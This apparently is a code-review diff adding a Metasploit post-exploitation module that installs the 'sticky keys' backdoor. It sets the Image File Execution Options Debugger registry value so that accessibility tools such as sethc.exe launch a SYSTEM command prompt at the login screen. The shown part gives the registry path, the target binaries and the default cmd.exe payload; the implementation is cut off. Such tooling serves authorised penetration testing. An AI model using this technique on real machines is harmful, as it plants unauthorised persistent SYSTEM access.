modules/post/windows/manage/sticky_keys.rb

```diff
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+
+  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
+  DEBUG_REG_VALUE = 'Debugger'
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'         => 'Sticky Keys Persistance Module',
+      'Description'  => %q{
+        This module makes it possible to apply the 'sticky keys' hack to a session with appropriate
+        rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP
+        login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting
+        for certain executables.
+
+        The module options allow for this hack to be applied to:
+
+        - SETHC   - sethc.exe is invoked when SHIFT is pressed 5 times.
+        - UTILMAN - Utilman.exe is invoked by pressing WINDOWS+U.
+        - OSK     - osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard.
+        - DISP    - DisplaySwitch.exe is invoked by pressing WINDOWS+P.
+
+        The hack can be added using the ADD action, and removed with the REMOVE action.
+
+        Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
+        to the target prior to running the module. By default, a SYSTEM command prompt is installed
+        using the registry method if this module is run without modifying any parameters.
+      },
+      'Author'       => ['OJ Reeves'],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter', 'cmd']
+    ))
+
+    register_options([
+      OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
+      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
+      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
```

Comment:
Would be cool if you could toss a payload back, but that's not the standard use case.